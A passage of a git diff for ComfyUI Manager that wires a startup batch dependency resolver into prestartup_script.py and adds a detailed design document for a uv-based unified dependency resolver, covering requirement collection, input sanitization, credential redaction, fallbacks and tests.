+ node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
+ base_requirements=collect_base_requirements(comfy_path),
+ blacklist=set(),
+ overrides={},
+ downgrade_blacklist=[],
+ )
+ _result = _resolver.resolve_and_install()
+ if _result.success:
+ _unified_resolver_succeeded = True
+ logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
+ else:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
+ except UvNotAvailableError:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
+ except Exception as e:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
+
# Check if script_list_path exists
if os.path.exists(script_list_path):
execute_startup_script()
diff --git a/docs/dev/DESIGN-unified-dependency-resolver.md b/docs/dev/DESIGN-unified-dependency-resolver.md
new file mode 100644
index 00000000..92d7324c
--- /dev/null
+++ b/docs/dev/DESIGN-unified-dependency-resolver.md
@@ -0,0 +1,777 @@
+# Architecture Design: Unified Dependency Resolver
+
+## 1. System Architecture
+
+### 1.1 Module Location
+
+```
+comfyui_manager/
+├── glob/
+│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
+├── common/
+│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
+│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
+│ └── unified_dep_resolver.py # New: Unified dependency resolution module
+├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
+└── legacy/
+ └── manager_core.py # Legacy (not a modification target)
+cm_cli/
+└── __main__.py # CLI entry: uv-compile command (on-demand batch resolution)
+```
+
+The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
+It reuses `manager_util` utilities and `cm_global` global state from the same package.
+
+> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
+> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
+> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
+> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
+>
+> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
+> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
+> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
+> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
+> and will work once real values are provided.
+
+### 1.2 Overall Flow
+
+```mermaid
+flowchart TD
+ subgraph INSTALL_TIME["Install Time (immediate)"]
+ MC["manager_core.py
execute_install_script() — 2 locations"]
+ MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install
(deps deferred to restart)"]
+ MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
+ SKIP --> INST["Run install.py"]
+ PIP --> INST
+ end
+
+ subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
+ CHK{use_unified_resolver?}
+ CHK -->|Yes| UDR
+ CHK -->|No| LAZY["execute_lazy_install_script()
per-node pip install (existing)"]
+
+ subgraph UDR["UnifiedDepResolver (batch)"]
+ S1["1. collect_requirements()
(ALL installed node packs)"]
+ S2["2. compile_lockfile()"]
+ S3["3. install_from_lockfile()"]
+ S1 --> S2 --> S3
+ end
+
+ UDR -->|Success| FIX["PIPFixer.fix_broken()"]
+ UDR -->|Failure| LAZY
+ LAZY --> FIX2["PIPFixer.fix_broken()"]
+ end
+```
+
+> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
+> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
+> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
+> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
+> (empty values passed); `uv pip compile` handles all conflict resolution natively.
+>
+> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
+> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
+> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
+> Both skip per-node pip install when unified mode is active.
+
+### 1.3 uv Command Strategy
+
+**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
+- Do not confuse with `uv lock`
+- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
+- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
+
+**`uv pip install -r`** ← Used instead of `uv pip sync`
+- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
+- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
+
+---
+
+## 2. Class Design
+
+### 2.1 UnifiedDepResolver
+
+```python
+class UnifiedDepResolver:
+ """
+ Unified dependency resolver.
+
+ Resolves and installs all dependencies of (installed node packs + new node packs)
+ at once using uv.
+
+ Responsibility scope: Dependency resolution and installation only.
+ install.py execution and PIPFixer calls are handled by the caller (manager_core).
+ """
+
+ def __init__(
+ self,
+ node_pack_paths: list[str],
+ base_requirements: list[str] | None = None,
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+ ):
+ """
+ Args:
+ node_pack_paths: List of node pack directory paths
+ base_requirements: Base dependencies (ComfyUI requirements, etc.)
+ blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
+ overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
+ downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
+ """
+
+ def resolve_and_install(self) -> ResolveResult:
+ """Execute full pipeline: stale cleanup → collect → compile → install.
+ Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
+
+ def collect_requirements(self) -> CollectedDeps:
+ """Collect dependencies from all node packs"""
+
+ def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
+ """Generate pinned requirements via uv pip compile"""
+
+ def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
+ """Install from pinned requirements (uv pip install -r)"""
+```
+
+### 2.2 Data Classes
+
+```python
+@dataclass
+class PackageRequirement:
+ """Individual package dependency"""
+ name: str # Package name (normalized)
+ spec: str # Original spec (e.g., "torch>=2.0")
+ source: str # Source node pack path
+
+@dataclass
+class CollectedDeps:
+ """All collected dependencies"""
+ requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
+ skipped: list[tuple[str, str]] # (package_name, skip_reason)
+ sources: dict[str, list[str]] # {package_name: [source_node_packs]}
+ extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
+
+@dataclass
+class LockfileResult:
+ """Compilation result"""
+ success: bool
+ lockfile_path: str | None # pinned requirements.txt path
+ conflicts: list[str] # Conflict details
+ stderr: str # uv error output
+
+@dataclass
+class InstallResult:
+ """Installation result (uv pip install -r is atomic: all-or-nothing)"""
+ success: bool
+ installed: list[str] # Installed packages (stdout parsing)
+ skipped: list[str] # Already installed (stdout parsing)
+ stderr: str # uv stderr output (for failure analysis)
+
+@dataclass
+class ResolveResult:
+ """Full pipeline result"""
+ success: bool
+ collected: CollectedDeps | None
+ lockfile: LockfileResult | None
+ install: InstallResult | None
+ error: str | None
+```
+
+---
+
+## 3. Core Logic Details
+
+### 3.1 Dependency Collection (`collect_requirements`)
+
+```python
+# Input sanitization: dangerous patterns to reject
+_DANGEROUS_PATTERNS = re.compile(
+ r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
+ r'|--find-links\b|-f\b|.*@\s*file://)',
+ re.IGNORECASE
+)
+
+def collect_requirements(self) -> CollectedDeps:
+ requirements = []
+ skipped = []
+ sources = defaultdict(list)
+ extra_index_urls = []
+
+ for path in self.node_pack_paths:
+ # Exclude disabled node packs (directory-based mechanism)
+ # Disabled node packs are actually moved to custom_nodes/.disabled/,
+ # so they should already be excluded from input at this point.
+ # Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
+ if ('/.disabled/' in path
+ or os.path.basename(os.path.dirname(path)) == '.disabled'
+ or path.rstrip('/').endswith('.disabled')):
+ continue
+
+ req_file = os.path.join(path, "requirements.txt")
+ if not os.path.exists(req_file):
+ continue
+
+ # chardet-based encoding detection (existing robust_readlines pattern)
+ for line in self._read_requirements(req_file):
+ line = line.split('#')[0].strip()
+ if not line:
+ continue
+
+ # 0. Input sanitization (security)
+ if self._DANGEROUS_PATTERNS.match(line):
+ skipped.append((line, f"rejected: dangerous pattern in {path}"))
+ logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
+ continue
+
+ # 1. Separate --index-url / --extra-index-url handling
+ # (BEFORE path separator check, because URLs contain '/')
+ if '--index-url' in line or '--extra-index-url' in line:
+ pkg_spec, index_url = self._split_index_url(line)
+ if index_url:
+ extra_index_urls.append(index_url)
+ line = pkg_spec
+ if not line:
+ # Standalone option line (no package prefix)
+ continue
+
+ # 1b. Reject path separators in package name portion
+ pkg_name_part = re.split(r'[><=!~;]', line)[0]
+ if '/' in pkg_name_part or '\\' in pkg_name_part:
+ skipped.append((line, f"rejected: path separator in package name"))
+ continue
+
+ # 2. Apply remap_pip_package (using cm_global.pip_overrides)
+ pkg_spec = self._remap_package(line)
+
+ # 3. Blacklist check (cm_global.pip_blacklist)
+ pkg_name = self._extract_package_name(pkg_spec)
+ if pkg_name in self.blacklist:
+ skipped.append((pkg_spec, "blacklisted"))
+ continue
+
+ # 4. Downgrade blacklist check (includes version comparison)
+ if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
+ skipped.append((pkg_spec, "downgrade blacklisted"))
+ continue
+
+ # 5. Collect (no dedup — uv handles resolution)
+ req = PackageRequirement(
+ name=pkg_name,
+ spec=pkg_spec,
+ source=path,
+ )
+ requirements.append(req)
+ sources[pkg_name].append(path)
+
+ return CollectedDeps(
+ requirements=requirements,
+ skipped=skipped,
+ sources=dict(sources),
+ extra_index_urls=list(set(extra_index_urls)), # Deduplicate
+ )
+
+def _split_index_url(self, line: str) -> tuple[str, str | None]:
+ """Split 'package_name --index-url URL' → (package_name, URL).
+
+ Also handles standalone ``--index-url URL`` and
+ ``--extra-index-url URL`` lines (with no package prefix).
+ """
+ # Handle --extra-index-url first (contains '-index-url' as substring
+ # but NOT '--index-url' due to the extra-index prefix)
+ for option in ('--extra-index-url', '--index-url'):
+ if option in line:
+ parts = line.split(option, 1)
+ pkg_spec = parts[0].strip()
+ url = parts[1].strip() if len(parts) == 2 else None
+ return pkg_spec, url
+ return line, None
+
+def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
+ """Reproduce the downgrade version comparison from existing is_blacklisted() logic.
+
+ Same logic as manager_core.py's is_blacklisted():
+ - No version spec and already installed → block (prevent reinstall)
+ - Operator is one of ['<=', '==', '<', '~='] and
+ installed version >= requested version → block (prevent downgrade)
+ - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
+ """
+ if pkg_name not in self.downgrade_blacklist:
+ return False
+
+ installed_packages = manager_util.get_installed_packages()
+
+ # Version spec parsing (same pattern as existing is_blacklisted())
+ pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
+ match = re.search(pattern, pkg_spec)
+
+ if match is None:
+ # No version spec: prevent reinstall if already installed
+ if pkg_name in installed_packages:
+ return True
+ elif match.group(2) in ['<=', '==', '<', '~=']:
+ # Downgrade operator: block if installed version >= requested version
+ if pkg_name in installed_packages:
+ try:
+ installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
+ requested_ver = manager_util.StrictVersion(match.group(3))
+ if installed_ver >= requested_ver:
+ return True
+ except (ValueError, TypeError):
+ logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
+ return False
+
+ return False
+
+def _remap_package(self, pkg: str) -> str:
+ """Package name remapping based on cm_global.pip_overrides.
+ Reuses existing remap_pip_package() logic."""
+ if pkg in self.overrides:
+ remapped = self.overrides[pkg]
+ logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
+ return remapped
+ return pkg
+```
+
+### 3.2 Lockfile Generation (`compile_lockfile`)
+
+**Behavior:**
+1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
+2. Write collected requirements and base constraints to temp files
+3. Execute `uv pip compile` with options:
+ - `--output-file` (pinned requirements path within temp dir)
+ - `--python` (current interpreter)
+ - `--constraint` (base dependencies)
+ - `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
+4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
+5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
+6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
+7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
+
+### 3.3 Dependency Installation (`install_from_lockfile`)
+
+**Behavior:**
+1. Execute `uv pip install --requirement <lockfile> --python <interpreter>`
+ - **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
+2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
+3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
+4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
+5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
+
+### 3.4 uv Command Resolution
+
+**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
+1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
+2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
+3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
+
+### 3.5 Stale Temp File Cleanup
+
+**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
+- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
+- Deletes directories older than `max_age_seconds` (default: 1 hour)
+- Silently ignores `OSError` (permission issues, etc.)
+
+### 3.6 Credential Redaction
+
+```python
+_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
+
+def _redact_url(self, url: str) -> str:
+ """Mask authentication info in URLs. user:pass@host → ****@host"""
+ return self._CREDENTIAL_PATTERN.sub('://****@', url)
+```
+
+All `--extra-index-url` logging passes through `_redact_url()`:
+```python
+# Logging example within compile_lockfile()
+for url in deps.extra_index_urls:
+ logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
+ cmd += ["--extra-index-url", url] # Original URL passed to actual command
+```
+
+---
+
+## 4. Existing Code Integration
+
+### 4.1 manager_core.py Modification Points
+
+**2 `execute_install_script()` locations — both skip deps in unified mode:**
+
+#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
+
+#### 4.1.2 Standalone Function execute_install_script()
+
+**Both locations use the same pattern when unified mode is active:**
+
+1. `lazy_mode=True` → schedule and return early (unchanged)
+2. If `not no_deps and manager_util.use_unified_resolver`:
+ - **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
+ - Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
+3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
+4. `install.py` execution: **always runs immediately** regardless of resolver mode
+
+> **Parameter ordering differs:**
+> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
+> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
+
+#### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
+
+**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
+
+**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
+
+**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
+1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
+2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
+3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
+4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
+5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
+
+> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
+> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
+
+#### 4.1.5 `execute_lazy_install_script()` Modification
+
+When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
+(deps already batch-resolved at module scope). `install.py` still runs per node pack.
+
+```python
+# In execute_lazy_install_script():
+if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
+ # Per-node pip install: only runs if unified resolver is disabled or failed
+ ...
+# install.py always runs regardless
+```
+
+> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
+> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
+
+### 4.1.6 CLI Integration
+
+Two entry points expose the unified resolver in `cm_cli`:
+
+#### 4.1.6.1 Standalone Command: `cm_cli uv-compile`
+
+On-demand batch resolution — independent of ComfyUI startup.
+
+```bash
+cm_cli uv-compile [--user-directory DIR]
+```
+
+Resolves all installed node packs' dependencies at once. Useful for environment
+recovery or initial setup without starting ComfyUI.
+`PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure).
+
+#### 4.1.6.2 Install Flag: `cm_cli install --uv-compile`
+
+```bash
+cm_cli install [node2 ...] --uv-compile [--mode remote]
+```
+
+When `--uv-compile` is set:
+1. `no_deps` is forced to `True` → per-node pip install is skipped during each node installation
+2. After **all** nodes are installed, runs unified batch resolution over **all installed node packs**
+ (not just the newly installed ones — `uv pip compile` needs the complete dependency graph)
+3. `PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure)
+
+This differs from per-node pip install: instead of resolving each node pack's
+`requirements.txt` independently, all deps are compiled together to avoid conflicts.
+
+#### Shared Design Decisions
+
+- **Uses real `cm_global` values**: Unlike the startup path (4.1.3) which passes empty
+ blacklist/overrides, CLI commands pass `cm_global.pip_blacklist`,
+ `cm_global.pip_overrides`, and `cm_global.pip_downgrade_blacklist` — already
+  initialized at `cm_cli/__main__.py` module scope (see the `cm_global.pip_overrides` / `pip_blacklist` initialization near the top of that file).
+- **No `_unified_resolver_succeeded` flag**: Not needed — these are one-shot commands,
+ not startup gates.
+- **Shared helper**: Both entry points delegate to `_run_unified_resolve()` which
+ handles resolver instantiation, execution, and result reporting.
+- **Error handling**: `UvNotAvailableError` / `ImportError` → exit 1 with message.
+ Both entry points use `try/finally` to guarantee `PIPFixer.fix_broken()` runs
+ regardless of resolution outcome.
+
+**Node pack discovery**: Uses `cmd_ctx.get_custom_nodes_paths()` → `collect_node_pack_paths()`,
+which is the CLI-native path resolution (respects `--user-directory` and `folder_paths`).
+
+### 4.2 Configuration Addition (config.ini)
+
+```ini
+[default]
+# Existing settings...
+use_unified_resolver = false # Enable unified dependency resolution
+```
+
+### 4.3 Configuration Reading
+
+Follows the existing `read_uv_mode()` / `use_uv` pattern:
+- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
+- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
+- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
+
+### 4.4 manager_util.py Extension
+
+```python
+# manager_util.py
+use_unified_resolver = False # New global flag (separate from use_uv)
+```
+
+---
+
+## 5. Error Handling Strategy
+
+```mermaid
+flowchart TD
+ STARTUP["prestartup_script.py startup"]
+ STARTUP --> CHK{use_unified_resolver?}
+ CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
+
+ CHK -->|Yes| RAI["run_unified_resolver()"]
+ RAI --> STALE["cleanup_stale_tmp()
Clean stale temp dirs (>1 hour old)"]
+ STALE --> UV_CHK{uv installed?}
+ UV_CHK -->|No| UV_ERR["UvNotAvailableError
→ Fallback: execute_lazy_install_script per-node pip"]
+
+ UV_CHK -->|Yes| CR["collect_requirements()
(ALL installed node packs)"]
+ CR --> CR_DIS[".disabled/ path → auto-skip"]
+ CR --> CR_PARSE["Parse failure → skip node pack, continue"]
+ CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
+ CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
+ CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
+
+ CR --> CL["compile_lockfile()"]
+ CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
+ CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
+ CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
+ CL --> CL_TMP["Temp directory → finally block cleanup"]
+
+ CL -->|Success| IL["install_from_lockfile()"]
+ IL --> IL_OK["Total success → parse installed/skipped"]
+ IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
+ IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
+
+ IL_OK --> PF["PIPFixer.fix_broken()
Restore torch/opencv/frontend"]
+ PF --> LAZY["execute_lazy_install_script()
(install.py only, deps skipped)"]
+```
+
+> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
+> (per-node pip install), providing the same behavior as if unified mode were disabled.
+
+---
+
+## 6. File Structure
+
+### 6.1 New Files
+
+```
+comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
+tests/test_unified_dep_resolver.py # Unit tests
+```
+
+### 6.2 Modified Files
+
+```
+comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
+comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
+comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
+```
+
+> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
+
+---
+
+## 7. Dependencies
+
+| Dependency | Purpose | Notes |
+|-----------|---------|-------|
+| `uv` | Dependency resolution and installation | Already included in project dependencies |
+| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
+| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
+| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
+| `subprocess` | uv process execution | Standard library |
+| `dataclasses` | Result data structures | Standard library |
+| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
+| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
+| `time` | Stale temp file age calculation | Standard library |
+| `logging` | Per-step logging | Standard library |
+
+No additional external dependencies.
+
+---
+
+## 8. Sequence Diagram
+
+### Install Time + Startup Batch Resolution
+
+```mermaid
+sequenceDiagram
+ actor User
+ participant MC as manager_core
+ participant PS as prestartup_script
+ participant UDR as UnifiedDepResolver
+ participant UV as uv (CLI)
+
+ Note over User,MC: Install Time (immediate)
+ User->>MC: Install node pack X
+ MC->>MC: Git clone / download X
+ MC->>MC: Skip per-node pip (unified mode)
+ MC->>MC: Run X's install.py
+ MC-->>User: Node pack installed (deps pending)
+
+ Note over User,UV: ComfyUI Restart
+ User->>PS: Start ComfyUI
+ PS->>PS: Check use_unified_resolver
+ PS->>UDR: Create resolver (module scope)
+ UDR->>UDR: collect_requirements()
(ALL installed node packs)
+ UDR->>UV: uv pip compile --output-file
+ UV-->>UDR: pinned reqs.txt
+ UDR->>UV: uv pip install -r
+ UV-->>UDR: Install result
+ UDR-->>PS: ResolveResult(success=True)
+ PS->>PS: PIPFixer.fix_broken()
+ PS->>PS: execute_lazy_install_script()
(install.py only, deps skipped)
+ PS-->>User: ComfyUI ready
+```
+
+---
+
+## 9. Test Strategy
+
+### 9.1 Unit Tests
+
+| Test Target | Cases |
+|------------|-------|
+| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
+| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
+| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
+| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
+| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
+| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
+| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
+| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
+| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
+| Atomic model | On failure: installed=[], stderr populated |
+| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
+| `_remap_package` | pip_overrides remapping, unregistered packages |
+| Blacklist | torch family, torchsde, custom blacklist |
+| Duplicate handling | Same package with multiple specs → all passed to uv |
+| Multiple paths | Collection from multiple custom_nodes paths |
+| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
+| Concurrency | Two resolver instances each use unique temp directories |
+| Credential redaction | `user:pass@host` URL masked in log output |
+| `_redact_url` | `://user:pass@host` → `://****@host` conversion, no-credential URL passthrough |
+| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
+| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
+| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
+
+### 9.2 Integration Tests
+
+- End-to-end test in real uv environment
+- Existing pip fallback path test
+- config.ini setting toggle test
+- Environment integrity verification after PIPFixer call
+- lazy_mode scheduling behavior verification (Windows simulation)
+- `use_uv=False` + `use_unified_resolver=True` combination test
+- Large-scale dependency (50+ node packs) performance test
+
+---
+
+## 10. Implementation Order
+
+1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
+ - PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
+ - Blacklist/override filtering
+ - **Downgrade blacklist** (version comparison logic included)
+ - **Input sanitization** (-r, -e, @ file:// etc. rejection)
+ - **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
+ - **`.disabled` node pack filtering**
+ - Defensive cm_global access (getattr pattern)
+2. **Phase 2**: `compile_lockfile` implementation + tests
+ - uv pip compile invocation
+ - --output-file, --constraint, --python options
+ - Conflict parsing logic
+3. **Phase 3**: `install_from_lockfile` implementation + tests
+ - uv pip install -r invocation (NOT sync)
+ - Install result parsing
+4. **Phase 4**: Integration — startup batch + install-time skip
+ - `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
+ - `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
+ - `manager_util.py`: `use_unified_resolver` flag
+ - Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
+5. **Phase 5**: Integration tests + fallback verification + startup batch tests
+
+---
+
+## Appendix A: Existing Code Reference
+
+> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
+> Use `grep -n` or IDE symbol search for exact locations.
+
+### remap_pip_package Location (Code Duplication Exists)
+
+```
+comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
+comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
+```
+
+Both reference `cm_global.pip_overrides` with identical logic.
+The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
+
+### cm_global Global State
+
+```python
+# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
+cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
+cm_global.pip_overrides = {} # dict, loaded from JSON
+cm_global.pip_downgrade_blacklist = [ # list
+ 'torch', 'torchaudio', 'torchsde', 'torchvision',
+ 'transformers', 'safetensors', 'kornia'
+]
+```
+
+> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
+> If the resolver may be called from the CLI path, this initialization should also be verified.
+
+### PIPFixer Call Pattern
+
+```python
+# Within UnifiedManager.execute_install_script() method in manager_core.py:
+pip_fixer = manager_util.PIPFixer(
+ manager_util.get_installed_packages(),
+ context.comfy_path,
+ context.manager_files_path
+)
+# ... (after installation)
+pip_fixer.fix_broken()
+```
+
+The unified resolver does not call PIPFixer directly.
+The caller (execute_install_script) calls PIPFixer as part of the existing flow.
+
+### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
+
+```python
+# manager_core.py — def is_blacklisted(name)
+# 1. Simple pip_blacklist membership check
+# 2. pip_downgrade_blacklist version comparison:
+# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
+# - match is None (no version spec) + installed → block
+# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
+# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
+```
+
+The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
+It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
+
+### Existing Code --index-url Handling (Asymmetric)
+
+```python
+# Only exists in standalone function execute_install_script():
+if '--index-url' in package_name:
+ s = package_name.split('--index-url')
+ install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
+
+# UnifiedManager.execute_install_script() method does NOT have this handling
+```
+
+The unified resolver unifies both paths for consistent handling via `_split_index_url()`.
diff --git a/docs/dev/PRD-unified-dependency-resolver.md b/docs/dev/PRD-unified-dependency-resolver.md
new file mode 100644
index 00000000..2e8fb593
--- /dev/null
